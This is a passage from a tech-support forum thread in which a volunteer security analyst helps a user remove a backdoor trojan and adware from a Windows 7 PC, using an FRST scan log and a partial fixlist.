2016-10-12 13:55 - 2016-09-12 22:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-10-12 13:55 - 2016-09-12 22:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-10-12 13:55 - 2016-09-12 22:28 - 02399232 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-10-12 13:55 - 2016-09-12 22:26 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-10-12 13:55 - 2016-09-12 22:26 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-10-12 13:55 - 2016-09-12 22:26 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-10-12 13:55 - 2016-09-12 22:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-10-12 13:55 - 2016-09-12 22:25 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-10-12 13:55 - 2016-09-12 22:25 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-10-12 13:55 - 2016-09-09 20:01 - 01310528 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-10-12 13:55 - 2016-09-09 20:00 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-10-12 13:55 - 2016-09-09 20:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-10-12 13:55 - 2016-09-09 19:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-10-12 13:55 - 2016-09-09 19:42 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-10-12 13:55 - 2016-09-09 19:42 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-10-12 13:55 - 2016-09-09 19:42 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-10-12 13:55 - 2016-09-09 19:42 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-10-12 13:55 - 2016-09-09 19:39 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-10-12 13:55 - 2016-09-09 19:37 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-10-12 13:55 - 2016-09-08 22:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-10-12 13:55 - 2016-09-08 22:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-10-12 13:55 - 2016-09-08 16:49 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-10-12 13:55 - 2016-08-29 17:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-10-12 13:55 - 2016-08-29 17:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-10-12 13:55 - 2016-08-29 17:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-10-12 13:55 - 2016-08-29 16:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-10-12 13:55 - 2016-08-12 18:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-10-12 13:55 - 2016-08-12 18:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-10-12 13:55 - 2016-08-12 18:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-10-12 13:55 - 2016-08-06 17:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-10-12 13:55 - 2016-08-06 16:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-10-12 13:55 - 2016-08-06 16:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-10-12 13:55 - 2016-06-14 17:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-10-12 13:55 - 2016-06-14 17:05 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-10-12 13:55 - 2016-06-14 17:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-10-12 13:55 - 2016-06-14 17:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-10-12 13:55 - 2016-06-14 17:00 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2016-10-12 13:55 - 2016-06-14 16:55 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-10-12 13:55 - 2016-06-14 16:55 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-10-12 13:55 - 2016-06-14 16:54 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-10-11 20:52 - 2016-10-11 20:52 - 00000216 _____ C:\Users\violeta\Desktop\Realm of the Mad God.url
2016-10-10 20:51 - 2016-10-10 20:51 - 00000000 ____D C:\Users\violeta\AppData\LocalLow\BuKaGameStudio
2016-10-10 20:50 - 2016-10-10 20:50 - 00000216 _____ C:\Users\violeta\Desktop\Hunger Dungeon.url
2016-10-06 17:34 - 2016-10-12 15:17 - 00002052 _____ C:\Windows\epplauncher.mif
2016-10-06 17:19 - 2016-10-06 17:21 - 11640664 _____ (Microsoft Corporation) C:\Users\violeta\Downloads\MSEInstall(1).exe
2016-10-06 17:18 - 2016-10-06 17:18 - 14324408 _____ (Microsoft Corporation) C:\Users\violeta\Downloads\MSEInstall.exe
2016-10-06 17:17 - 2016-10-06 17:18 - 00000000 ____D C:\Users\violeta\AppData\Roaming\Duelyst
2016-10-06 11:21 - 2016-10-06 11:21 - 00000216 _____ C:\Users\violeta\Desktop\Duelyst.url
2016-10-06 11:13 - 2016-10-06 11:13 - 00000134 _____ C:\Users\violeta\Desktop\Spacewar.url
2016-10-04 07:09 - 2016-10-04 07:10 - 00000035 _____ C:\Users\violeta\Desktop\Nikola123456.txt
2016-09-30 20:23 - 2016-09-30 20:26 - 00000000 ____D C:\Users\violeta\Desktop\save eu4
2016-09-26 19:50 - 2016-09-26 19:50 - 01091008 _____ (Unity Technologies ApS) C:\Users\violeta\Downloads\UnityWebPlayer.exe
2016-09-25 07:46 - 2016-10-13 08:33 - 00000000 ____D C:\Users\violeta\AppData\LocalLow\uTorrent
2016-09-24 12:29 - 2016-09-25 07:46 - 00000000 ____D C:\Program Files\Mozilla Firefox
2016-09-21 08:47 - 2016-08-05 17:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-09-19 21:10 - 2016-10-16 11:43 - 00000000 ____D C:\Users\violeta\Desktop\fajlovi sa flesa
2016-09-19 20:35 - 2016-09-19 20:35 - 00000000 ____D C:\Users\violeta\AppData\Local\{26E83D09-9D35-755D-7492-57CF5473C38A}
2016-09-18 21:36 - 2016-09-18 21:37 - 00000000 ____D C:\Users\violeta\AppData\Local\HirezLauncherUI
2016-09-18 21:31 - 2016-10-17 03:24 - 00000000 ____D C:\Program Files\Hi-Rez Studios
2016-09-18 21:14 - 2016-09-18 21:14 - 00000215 _____ C:\Users\violeta\Desktop\Worms Reloaded.url
2016-09-18 21:12 - 2016-09-18 21:12 - 00000216 _____ C:\Users\violeta\Desktop\Paladins.url
2016-09-18 16:29 - 2016-09-18 16:29 - 01176864 _____ C:\Users\violeta\Downloads\Thaumcraft Mod Installer 1.7.10.exe
2016-09-18 16:27 - 2016-09-18 16:27 - 01171232 _____ C:\Users\violeta\Downloads\Ars Magica 2 Mod Installer 1.7.10.exe
2016-09-18 16:22 - 2016-09-18 16:22 - 00167936 _____ (ICSharpCode.net) C:\Users\violeta\Downloads\ICSharpCode.SharpZipLib1.dll
2016-09-18 16:21 - 2016-09-18 16:21 - 01184544 _____ C:\Users\violeta\Downloads\Buildcraft Mod Installer 1.7.10.exe
2016-09-18 16:20 - 2016-09-18 16:20 - 01174304 _____ C:\Users\violeta\Downloads\Not Enough Items Mod Installer 1.7.10.exe
2016-09-18 16:19 - 2016-09-18 19:05 - 00000000 ____D C:\Users\violeta\AppData\Roaming\.minecraft
2016-09-17 18:55 - 2016-09-17 18:55 - 00000459 _____ C:\Users\violeta\Downloads\$SpriteCollection.cs
2016-09-17 18:50 - 2016-07-27 01:25 - 17711616 _____ C:\Users\violeta\Desktop\voice tcg tester.exe
2016-09-17 18:18 - 2016-02-12 07:58 - 00003471 _____ C:\Users\violeta\Desktop\LoadingScreenManager.cs

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-17 06:41 - 2016-05-17 18:21 - 00000000 ____D C:\Program Files\TunnelBear
2016-10-17 06:30 - 2012-04-14 09:03 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-10-17 05:47 - 2012-04-15 11:58 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-17 03:35 - 2009-07-14 06:34 - 00026320 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-17 03:35 - 2009-07-14 06:34 - 00026320 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-17 03:26 - 2015-11-24 15:38 - 00000000 ____D C:\Users\violeta\AppData\Local\LogMeIn Hamachi
2016-10-17 03:23 - 2016-03-12 14:44 - 00000091 _____ C:\HaxLogs.txt
2016-10-17 03:23 - 2013-06-01 20:30 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2016-10-17 03:23 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-16 16:02 - 2015-01-12 21:22 - 00000000 ____D C:\Program Files\Steam
2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UnHackMe
2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\Program Files\UnHackMe
2016-10-16 08:53 - 2014-06-19 12:46 - 00000000 ____D C:\Program Files\Electronic Arts
2016-10-16 08:53 - 2011-12-24 12:37 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2016-10-16 08:52 - 2009-07-14 06:52 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-10-16 08:39 - 2013-03-01 16:15 - 00000000 ____D C:\Users\violeta\Documents\spore
2016-10-16 07:53 - 2016-03-12 14:11 - 00000264 _____ C:\Windows\system32\PARTIZAN.TXT
2016-10-15 17:30 - 2014-04-13 13:53 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2016-10-15 17:30 - 2014-04-13 13:53 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2016-10-15 17:30 - 2011-12-19 14:45 - 00000000 ____D C:\Windows\system32\Macromed
2016-10-14 22:04 - 2015-03-05 20:50 - 00000000 ____D C:\AdwCleaner
2016-10-14 21:37 - 2012-03-27 18:25 - 00000000 ____D C:\Program Files\Common Files\Steam
2016-10-14 10:39 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf
2016-10-13 16:40 - 2012-04-01 13:19 - 00000000 ____D C:\Users\violeta\AppData\Roaming\uTorrent
2016-10-13 15:42 - 2016-09-11 14:11 - 00000000 ____D C:\Users\violeta\Documents\voice tcg try
2016-10-13 14:41 - 2016-05-15 11:50 - 00000000 ____D C:\ProgramData\Unity
2016-10-13 14:17 - 2016-09-11 13:44 - 00000000 ____D C:\Program Files\Unity
2016-10-13 14:00 - 2011-12-18 17:09 - 00795958 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-13 12:22 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\rescache
2016-10-13 08:29 - 2016-09-12 07:05 - 03913080 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-13 08:26 - 2016-04-14 13:26 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-10-13 08:26 - 2016-04-14 13:26 - 00000000 ____D C:\Windows\system32\appraiser
2016-10-13 08:25 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\system32\Dism
2016-10-13 08:23 - 2014-10-08 17:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-12 22:45 - 2014-10-15 21:38 - 00000000 ____D C:\Windows\system32\MRT
2016-10-12 22:44 - 2014-10-08 17:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-12 22:44 - 2012-01-09 12:12 - 141042968 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-10-11 20:51 - 2013-08-29 16:54 - 00000000 ____D C:\Users\violeta\AppData\Roaming\Origin
2016-10-11 20:51 - 2013-08-28 16:57 - 00000000 ____D C:\ProgramData\Origin
2016-10-11 20:50 - 2016-01-02 20:19 - 00000000 ____D C:\Program Files\Origin
2016-10-11 20:48 - 2016-01-02 20:23 - 00000000 ____D C:\Users\violeta\AppData\Local\Origin
2016-10-09 22:25 - 2012-08-26 16:39 - 00000444 ____H C:\Windows\Tasks\Norton Security Scan for violeta.job
2016-10-06 20:12 - 2016-04-23 12:46 - 00000000 ____D C:\Users\violeta\BrawlhallaReplays
2016-10-06 17:16 - 2014-10-06 16:25 - 00000000 ____D C:\ProgramData\Package Cache
2016-09-30 20:21 - 2015-08-03 12:30 - 00000000 ____D C:\Program Files\TeamViewer
2016-09-27 08:50 - 2016-09-15 06:58 - 00000000 ____D C:\Users\violeta\Desktop\Za crtanje
2016-09-26 19:51 - 2012-04-16 11:29 - 00000000 ____D C:\Users\violeta\AppData\Local\Unity
2016-09-25 07:46 - 2012-05-03 09:27 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2016-09-24 10:32 - 2016-03-12 13:53 - 00000000 ____D C:\Users\Public\Documents\regruninfo
2016-09-24 10:28 - 2016-03-27 13:07 - 00000059 _____ C:\Users\violeta\AppData\Local\UserProducts.xml
2016-09-24 10:28 - 2016-03-12 13:53 - 00000000 ____D C:\Users\violeta\Documents\RegRun2
2016-09-21 08:29 - 2009-07-14 06:53 - 00032592 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-09-19 20:36 - 2014-07-02 10:34 - 00000000 ____D C:\Users\violeta\AppData\Local\Battle.net
2016-09-19 20:09 - 2016-08-25 15:05 - 00000000 ____D C:\Program Files\Battle.net
2016-09-18 21:42 - 2014-01-27 12:12 - 00000000 ____D C:\ProgramData\Hi-Rez Studios
2016-09-18 21:41 - 2012-08-22 17:38 - 00000000 ____D C:\Users\violeta\Documents\My Games
2016-09-18 21:40 - 2014-01-27 12:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hi-Rez Studios
2016-09-18 16:27 - 2015-03-06 12:56 - 00000000 ____D C:\Minecraft_Backup
2016-09-17 15:26 - 2015-04-03 12:38 - 00000000 ____D C:\Users\violeta\AppData\Roaming\CodeBlocks
2016-09-17 14:30 - 2016-08-10 10:07 - 00000000 ____D C:\Users\violeta\Desktop\programi

==================== Files in the root of some directories =======

2016-04-24 18:04 - 2015-11-25 14:53 - 0000422 _____ () C:\Program Files\update-PayDay2.bat
2016-04-24 18:04 - 2013-10-12 20:47 - 0000732 _____ () C:\Program Files\visit-www.nosteam.ro.html
2016-03-13 15:32 - 2016-03-13 15:32 - 3120771 _____ () C:\Program Files\Common Files\4gzl5t3d.exe
2016-03-12 12:24 - 2016-03-12 12:24 - 3170418 _____ () C:\Program Files\Common Files\kqhpkjmf.exe
2015-07-05 16:23 - 2015-07-05 16:23 - 0000000 _____ () C:\Users\violeta\AppData\Roaming\6D6C.tmp
2015-06-05 18:51 - 2016-03-12 13:42 - 0000024 _____ () C:\Users\violeta\AppData\Roaming\appdataFr25.bin
2015-02-02 12:52 - 2015-05-09 18:54 - 0000020 _____ () C:\Users\violeta\AppData\Roaming\appdataFr3.bin
2015-06-17 15:58 - 2015-06-17 15:58 - 0000166 _____ () C:\Users\violeta\AppData\Roaming\Camdata.ini
2015-06-17 15:58 - 2015-06-17 15:58 - 0000408 _____ () C:\Users\violeta\AppData\Roaming\CamLayout.ini
2015-06-17 15:58 - 2015-06-17 15:58 - 0000408 _____ () C:\Users\violeta\AppData\Roaming\CamShapes.ini
2012-08-17 18:27 - 2012-08-18 08:07 - 0000212 _____ () C:\Users\violeta\AppData\Roaming\FireArcadeSettings.cfg
2014-07-12 15:17 - 2014-07-12 15:18 - 0000080 _____ () C:\Users\violeta\AppData\Roaming\id.TXT.qjqtinm
2015-01-13 21:01 - 2015-01-13 21:11 - 0000098 _____ () C:\Users\violeta\AppData\Roaming\LauncherSettings_live.cfg
2012-11-03 17:48 - 2014-06-06 19:26 - 0138056 _____ () C:\Users\violeta\AppData\Roaming\PnkBstrK.sys
2015-01-13 21:06 - 2015-01-13 21:07 - 0008142 _____ () C:\Users\violeta\AppData\Roaming\TheHunterSettings_live.bin
2015-01-13 20:56 - 2015-01-13 20:56 - 0000039 _____ () C:\Users\violeta\AppData\Roaming\TheHunterSettings_steam_live.cfg
2015-06-17 15:07 - 2015-06-17 15:07 - 0000096 _____ () C:\Users\violeta\AppData\Roaming\version2.xml
2013-12-19 14:02 - 2015-03-01 14:02 - 0000180 _____ () C:\Users\violeta\AppData\Roaming\WB.CFG
2016-08-04 08:51 - 2016-08-04 08:52 - 0341504 _____ () C:\Users\violeta\AppData\Roaming\wsrv_d6d23f59.dat
2013-07-12 15:49 - 2013-07-12 15:54 - 0081582 _____ () C:\Users\violeta\AppData\Roaming\zulagames.ico
2014-06-12 14:10 - 2014-06-13 13:18 - 0004608 _____ () C:\Users\violeta\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-06-27 09:19 - 2012-06-27 09:19 - 0000095 _____ () C:\Users\violeta\AppData\Local\fusioncache.dat
2016-03-12 11:19 - 2016-03-12 11:19 - 0041472 _____ () C:\Users\violeta\AppData\Local\Ganjalax.dat
2016-03-12 11:19 - 2016-03-12 11:19 - 0000187 _____ () C:\Users\violeta\AppData\Local\Ganjalax.exe.config
2014-05-11 12:48 - 2014-05-11 12:48 - 0000851 _____ () C:\Users\violeta\AppData\Local\recently-used.xbel
2014-12-19 18:23 - 2014-12-19 18:23 - 0007605 _____ () C:\Users\violeta\AppData\Local\Resmon.ResmonCfg
2016-03-27 13:07 - 2016-03-27 13:07 - 0000003 _____ () C:\Users\violeta\AppData\Local\updater.log
2016-03-27 13:07 - 2016-09-24 10:28 - 0000059 _____ () C:\Users\violeta\AppData\Local\UserProducts.xml
2012-08-16 08:42 - 2013-04-27 11:43 - 0000000 _____ () C:\ProgramData\fea2c9c08b989e2944104c6544fdfaa4_c
2012-11-04 15:06 - 2012-09-05 15:06 - 0000032 ____R () C:\ProgramData\hash.dat
2014-04-27 11:56 - 2010-11-05 03:58 - 0032768 __RSH (Microsoft Corporation) C:\ProgramData\Microsoft.com
2016-09-14 08:10 - 2016-05-04 16:55 - 73149184 ___SH () C:\ProgramData\msdsrnwj.exe
2016-07-06 17:31 - 2012-08-31 14:08 - 0024772 _____ () C:\ProgramData\P1100DEF.css
2016-07-06 17:31 - 2016-07-06 17:31 - 0004174 _____ () C:\ProgramData\P1100OS.HTM
2016-07-06 17:31 - 2012-08-31 14:08 - 0002944 _____ () C:\ProgramData\P1100SIG.GIF
2014-11-15 15:55 - 2014-11-15 15:55 - 0000000 _____ () C:\ProgramData\spds90.txt
2015-06-02 20:46 - 2015-06-03 16:29 - 4496993 _____ () C:\ProgramData\zydwhsg.html

Files to move or delete:
====================
C:\ProgramData\hash.dat
C:\ProgramData\msdsrnwj.exe
C:\Users\violeta\spopoi.exe


Some files in TEMP:
====================
C:\Users\violeta\AppData\Local\Temp\cdo2111017090.dll
C:\Users\violeta\AppData\Local\Temp\cdo2385742626.dll
C:\Users\violeta\AppData\Local\Temp\cdo683995543.dll
C:\Users\violeta\AppData\Local\Temp\Foxit Updater.exe
C:\Users\violeta\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
C:\Users\violeta\AppData\Local\Temp\HiRezLauncherControls.dll
C:\Users\violeta\AppData\Local\Temp\libeay32.dll
C:\Users\violeta\AppData\Local\Temp\msvcr120.dll
C:\Users\violeta\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-10-15 12:14

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (57.7 KB, 94 views)
nikolap is offline  
Old 10-17-2016, 08:08 PM   #8
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. You didn't answer my question. Did you also delete all those cracked installers listed in the ckfiles.txt, at least all the ones that were true cracks?

Also, are you aware your System Restore is disabled? Did you disable it?

----------------------------------------------------

One or more of the identified infections is a backdoor trojan.

This type of infection allows hackers to remotely control your computer, log keystrokes, steal critical system information, and download and execute files without your knowledge.

If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Do not change passwords or do any transactions from the infected computer until it has been cleaned.

------------------------------------------------------

Please download the Suspicious File Packer and Save it to your Desktop.
  • Unzip it to the desktop and run it.
  • Copy/paste the following list of files into the Suspicious File Packer window:

    C:\Windows\system32\Microsoft.com

  • Allow SFP to pack the files by clicking Continue
  • This will generate a CAB archive on your desktop named requested-files[Date/Time].cab
  • Please submit it to this site ==> Submit a Malware Sample and include this link in the message->>http://www.techsupportforum.com/forums/f50/not-working-correctly-windows-firewall-1163025.html#post7255345
  • You can then delete the requested-files.cab file from your desktop, once you have uploaded it to the above recipient.
  • Please let me know you submitted the file.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-17-2016, 11:34 PM   #9

I am sorry to bother you but I can't seem to find this file. I tried placing the address in the browser, which made an executable. Your instructions say this should be some form of a text file.
C:\Windows\system32\Microsoft.com
To answer your previous questions at the very least:
1. I did delete those installers.
2. I was not aware of the System Restore being disabled; since I never used it, I have no idea how to open it.
nikolap is offline  
Old 10-18-2016, 04:53 AM   #10

Hello again, nikolap. That Microsoft.com file is an executable.
chemist is offline  
Old 10-18-2016, 10:41 AM   #11

I have now submitted the file.
nikolap is offline  
Old 10-18-2016, 02:14 PM   #12

Hello again, nikolap. Thanks for submitting the file.

Go to Control Panel > System > System Protection > click on Windows (C:)(System) > Configure > Restore system settings and previous versions of files > OK > OK.

Were you able to turn it on?

----------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.

https://windows.microsoft.com/en-us/w...#1TC=windows-7

Also, if you haven't done so already, create a system repair disc. It's really easy and quick.

https://pcsupport.about.com/od/window...-windows-7.htm

------------------------------------------------------

I noticed you have BS Player Toolbar installed.

Please read this and decide if you want to keep it >> SystemLookup - fed66dc5-1b74-4a04-8f5c-15c5ace2b9a5

You can uninstall it via Programs and Features in your Control Panel.

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\BS_Player

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->(Programs)->Programs and Features if it still exists:

Contextual Tool Yourprofitclub<<This entry is classified as malware, spyware, adware, or other potentially unwanted software.

------------------------------------------------------
  • Open Notepad (Start > All Programs > Accessories > Notepad).
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST.exe
  • If asked to change 'Encoding:' to 'Unicode:', please agree and save it.

    NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.


    Code:
    start
    createrestorepoint:
    TuneUp Utilities 2013 (Version: 13.0.3000.138 - TuneUp Software) Hidden
    TuneUp Utilities Language Pack (en-US) (Version: 13.0.3000.138 - TuneUp Software) Hidden
    Task: {01835097-7B05-4094-B39B-A6F6BF09B715} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
    Task: {05117A57-15BB-4310-AB94-ABEB78135006} - \{CFFDB85C-56BE-4D73-B744-97DB7D610B8E} -> No File <==== ATTENTION
    Task: {0906990C-C047-4C7D-8D22-5255F1024FB3} - \{1E9494FA-6CA3-400B-B661-31837511C7EE} -> No File <==== ATTENTION
    Task: {1C7306D1-9834-4D43-A2C5-FEFAE0216B5D} - \{3E27A315-206F-40D5-88C8-C29D09D3BAEB} -> No File <==== ATTENTION
    Task: {258FDF9B-E6BF-4C1D-85FE-93C16438F4BE} - \RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
    Task: {334E8B80-9763-434E-8437-770A5DC4A520} - \20sve2tm -> No File <==== ATTENTION
    Task: {39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3} - \{33C192B0-0851-4C18-BB29-6CDD784756BE} -> No File <==== ATTENTION
    Task: {4D36E943-5B4B-417D-866E-E3F85BD73E06} - \TuneUpUtilities_Task_BkGndMaintenance2013 -> No File <==== ATTENTION
    Task: {4E8A2AB5-82D2-4748-9188-0E52B2B4F655} - \RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380} -> No File <==== ATTENTION
    Task: {4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4} - \{F0E4F20A-26C0-4803-85F3-DE100A506A22} -> No File <==== ATTENTION
    Task: {5E4FD528-665B-4BC7-92C3-FC3316142788} - \{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC} -> No File <==== ATTENTION
    Task: {694BC2C8-C491-43DE-BBE5-75891AEE91CB} - \{0EC195FB-14E3-4A02-B5E5-AAFFE238361D} -> No File <==== ATTENTION
    Task: {72ACF684-33A4-45E8-ACB2-EAF73F1A890E} - \{7BF7CA1C-3C80-4A51-B3A7-61A431253F64} -> No File <==== ATTENTION
    Task: {74889F7C-185A-465F-8C1C-567D2DCC89F3} - \pimofki -> No File <==== ATTENTION
    Task: {7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279} - \fuwykpyf -> No File <==== ATTENTION
